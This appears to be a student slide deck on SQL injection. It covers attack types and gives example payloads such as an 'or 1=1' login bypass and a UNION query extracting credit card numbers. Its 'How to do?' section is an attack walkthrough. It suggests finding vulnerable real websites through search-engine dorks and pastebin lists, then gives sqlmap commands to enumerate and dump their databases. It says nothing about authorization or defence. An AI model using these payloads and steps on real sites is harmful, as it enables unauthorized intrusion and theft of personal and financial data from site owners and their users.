SQL Injection

Lucas Carpio - Jumil Ortiz

What is SQL Injection

  • Injecting SQL code in database applications to dump/return the database.

How it works?

•For example:

  1. Websites takes user input from a form
  2. This user input is used literally in the construction of a SQL query submitted to a database.
  3. User sends SQL commands instead of the normal “input” through that form.
  4. SQL query responds hence successful Injection performed.

SELECT Count (*) FROM Users WHERE UserNaME  = 'test@test.com' or 1=1--' AND Password=''

SQL Injection Risks

  • Adding new data to the database
    • Example eCommerce website selling incorrect items etc
  • Modifying data
    • Examples
    • eCommerce with super discounted items
    • Accessing Personal data on social networking websites
  • Gaining Admin Access
    • Server/ftp
    • Website
    • Database

SQL Injection Attacks

  • Authentication by pass: Using this attack, an attacker logs onto an application without providing valid user name and password and gains administrative privileges.
  • Information Disclousure: Using this attack, an attacker obtains sensitive information that is stored in the database.
  • Compromised Data Integrity: An attacker uses this attack to deface a web page, insert malicious content into web pages, or alter the contents of a database.
  • Compromised Availability: Attackes use this attack to delete the database information, delete log, or audit information that is stored in a database.
  • Remote Code Execution: It assists an attacker to compromise the host OS.

How Web Application Works

SQL Injection and Server-Side Tecnologies

  • Server-Side Tecnology: Powerful server-side technologies like ASP.NET and database servers allow developers to create dynamic, data-driven websites with incredible ease.
  • Exploit: The power of ASP.NET and SQL can easily be exploited by hackers using SQL injection attacks.
  • Susceptible Databases: All relational databases, SQL Server,Oracle,INM DB2, and MySQL, are susceptible to SQL-injection attacks.
  • Attack: SQL injection attacks do not exploit a specific software vulnerability, instead they target websites that do not follow secure coding practices for accessing and manipulating data stored in a relational database.

Types of Sql Injection

Error Based Sql Injection

  • Error based SQL injection forces the database to perform some operations in which result will be an error.

  • The attacks above should throw 'duplicate entry' errors.

Error Based Sql Injection(2)

  • System Stored Procedure.
Exploit databases stored procedures.
  • End of Line Comment.
Select * FROM users WHERE name = 'x' AND userid IS NULL; --;
  • Tautology.
Select * FROM users WHERE name = '' or '1' = '1' ;
  • Union SQL injection.
SELECT name , phone, address FROM users WHERE id=1 UNION ALL SELECT credictCardNumber ,1,1 FROM CreditCardTable

Blind Sql Injection

  • No error message.
When the results are not visible to the attacker.
  • Generic Page.
Rather than see an useful error message, show a generic message custom message.
  • Time Intensive.
Become a time-intensive because a new statement must be crafted for each bit recovered.

How to do?

•Learn SQL! (pro way)


•Use prebuilt programs (SQLmap)

First Step: Finding a Vulnerable Website

  • Many ways to do this
  • Easiest way is to go on google.com and in search type
    • Index.php?’
    • Sql injectable websites pastebin 2015
  • At the end of the URL, put a ‘ and see if gives you any SQL errors/warning

Loading up SQLmap

  • Requires Python on your computer
  • Runs on windows/mac/linux
  • Windows Users need to cd to the path of the sqlmap folder using cmd.

Loading up SQLmap

  • git clone:
    • https://github.com/sqlmapproject/sqlmap.git
  • Linux Server Access Using Putty/ssh:
    • cis-linux2.temple.edu
    • astro.temple.edu
  • Website we will be injecting:
    • http://testphp.acunetix.com/listproducts.php?cat=1

Common SQLmap parameters

  • -u: is for the URL
  • --dbs : is the option to get the database list from the injectable website
  • --tables : lists the tables in the SQL server
  • --columns : gets columns of a table in the database
  • --dump: dumps the database
  • -D: specific database you want data from
  • -T: specific table you want data from

SQLmap Commands

  • $ python sqlmap.py -u "http://www.site.com/section.php?id=51"
  • $ python sqlmap.py -u "http://www.sitemap.com/section.php?id=51" –dbs
  • $ python sqlmap.py -u "http://www.site.com/section.php?id=51" --tables -D “specific database parameter”
  • $ python sqlmap.py -u "http://www.site.com/section.php?id=51" --columns -D “specific database parameter” -T “specific tables”
  • $ python sqlmap.py -u "http://www.site.com/section.php?id=51" --dump -D “specific database parameter” -T “specific tables”

The dump of the database can be found at

  • Linux: cd .sqlmap/
  • Windows: inside your sqlmap program directory in “output” folder

SQL Injection

By Lucas Carpio

SQL Injection

  • 2,717